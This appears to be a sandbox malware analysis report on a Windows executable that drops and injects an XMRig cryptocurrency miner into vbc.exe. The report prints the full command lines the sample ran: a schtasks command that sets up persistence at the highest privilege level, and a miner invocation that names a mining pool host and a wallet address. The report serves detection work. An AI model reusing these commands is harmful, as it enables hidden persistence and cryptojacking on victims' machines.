Resubmissions
Submitted          | Analysis ID        | Score
10/10/2024, 04:54  | 241010-fjqxaaxgme  | 10
10/10/2024, 02:37  | 241010-c366tsvgpc  | 10
29/01/2024, 18:13  | 240129-wtq8sshdcl  | 10
Analysis
- max time kernel: 136s
- max time network: 149s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29/01/2024, 18:13
Static task: static1
Behavioral task: behavioral1
Sample: 9b3430f42a0fb00d014c2fa208662865.exe
Resource: win7-20231215-en
General
- Target: 9b3430f42a0fb00d014c2fa208662865.exe
- Size: 4.8MB
- MD5: 9b3430f42a0fb00d014c2fa208662865
- SHA1: 09a16508bcc0a6da90c272daa2eff627ccd3205d
- SHA256: 8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47
- SHA512: d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29
- SSDEEP: 98304:CdlaF/1RByjAQG/Mul2rq/aReDkizMeQUh:CdYvkji/Mul2rVe4iwVUh
Malware Config
Signatures
XMRig Miner payload (14 IoCs)
resource | yara_rule
behavioral2/memory/1800-23-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-24-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-26-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-27-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-28-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-29-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-30-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-31-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-32-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-34-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-35-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-37-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-36-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
behavioral2/memory/1800-40-0x0000000140000000-0x00000001407DC000-memory.dmp | xmrig
.NET Reactor protector (3 IoCs)
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource | yara_rule
behavioral2/memory/3992-0-0x0000000000990000-0x0000000000E6A000-memory.dmp | net_reactor
behavioral2/files/0x0006000000023215-13.dat | net_reactor
behavioral2/files/0x0006000000023215-12.dat | net_reactor
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | .exe
Executes dropped EXE (1 IoCs)
pid | Process
2780 | .exe
UPX-packed memory regions (yara rule upx, 17 IoCs)
resource | yara_rule
behavioral2/memory/1800-18-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-21-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-20-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-23-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-24-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-26-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-27-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-28-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-29-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-30-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-31-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-32-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-34-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-35-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-37-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-36-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
behavioral2/memory/1800-40-0x0000000140000000-0x00000001407DC000-memory.dmp | upx
Uses the VBS compiler for execution (1 TTPs)
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 2780 set thread context of 1800 | 2780 | .exe | 100
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1880 | schtasks.exe
Delays execution with timeout.exe (1 IoCs)
pid | Process
4024 | timeout.exe
Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid | Process
2780 | .exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3992 | 9b3430f42a0fb00d014c2fa208662865.exe
Token: SeDebugPrivilege | 2780 | .exe
Token: SeLockMemoryPrivilege | 1800 | vbc.exe
Token: SeLockMemoryPrivilege | 1800 | vbc.exe
Suspicious use of FindShellTrayWindow (1 IoCs)
pid | Process
1800 | vbc.exe
Suspicious use of WriteProcessMemory (17 IoCs)
description | pid | Process | procid_target
PID 3992 wrote to memory of 3560 | 3992 | 9b3430f42a0fb00d014c2fa208662865.exe | 87
PID 3992 wrote to memory of 3560 | 3992 | 9b3430f42a0fb00d014c2fa208662865.exe | 87
PID 3560 wrote to memory of 4024 | 3560 | cmd.exe | 88
PID 3560 wrote to memory of 4024 | 3560 | cmd.exe | 88
PID 3560 wrote to memory of 2780 | 3560 | cmd.exe | 89
PID 3560 wrote to memory of 2780 | 3560 | cmd.exe | 89
PID 2780 wrote to memory of 4076 | 2780 | .exe | 91
PID 2780 wrote to memory of 4076 | 2780 | .exe | 91
PID 4076 wrote to memory of 1880 | 4076 | cmd.exe | 93
PID 4076 wrote to memory of 1880 | 4076 | cmd.exe | 93
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
PID 2780 wrote to memory of 1800 | 2780 | .exe | 100
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe"
  PID: 3992
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp49DA.tmp.bat""
    PID: 3560
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\timeout.exe
      command line: timeout 3
      PID: 4024
      - Delays execution with timeout.exe
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      command line: "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      PID: 2780
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        PID: 4076
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\schtasks.exe
          command line: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          PID: 1880
          - Creates scheduled task(s)
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        PID: 1800
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
Downloads
-
- Filesize: 486KB
- MD5: 7a14e29eae2d9f2854edd04254a0e6c7
- SHA1: d2b7f4d530f6550fe171cc7be768f9a75fee31ab
- SHA256: 0d4d780921e2a0dfab7256a1736b52897bd79880a3099d2101f96abc21e08697
- SHA512: 58e7b8b3402efe1e44300a0021d628980e0a174f8eb1cb468947f3c5b2390add2db170b4a0d77ed55315bec8852cab8fb61cc37cdad847c7af73c44713b8a83a
-
- Filesize: 495KB
- MD5: 7b32894b5cce3d3e639d8edfe83b3732
- SHA1: 061da55a51deaf0f4f77a88d17bee1b18d858ff7
- SHA256: 6e8a4281635c01e7c5f2b19826705d544ffe5d681256c53380496b8e3438eed1
- SHA512: 95d2abbf2c8b5ce4fb7a62484e0e579613ce2ad9b60ac530155f4f70b2b464c577f482872c145fa9b7f92120e371bf90fa591d54c0dc69805de608b9fa77f263
-
- Filesize: 168B
- MD5: 087adf66381bbd31593de1b9b61f9abd
- SHA1: 06a3084c996951e7891682d53b0d129910aa0a3c
- SHA256: 01ed5514455ca118ded2abc7267caa2f8c8837b9e384eb1e16fd557df2bbe7c8
- SHA512: cd20aad34814ddef12a473c98e6f0dd3857faa13517f2b3dd3e59184aa99de5c7d0003fb54f02f2c94ce551d997e4c0cad4dc40edf95aaf1610c8fabb4c109a8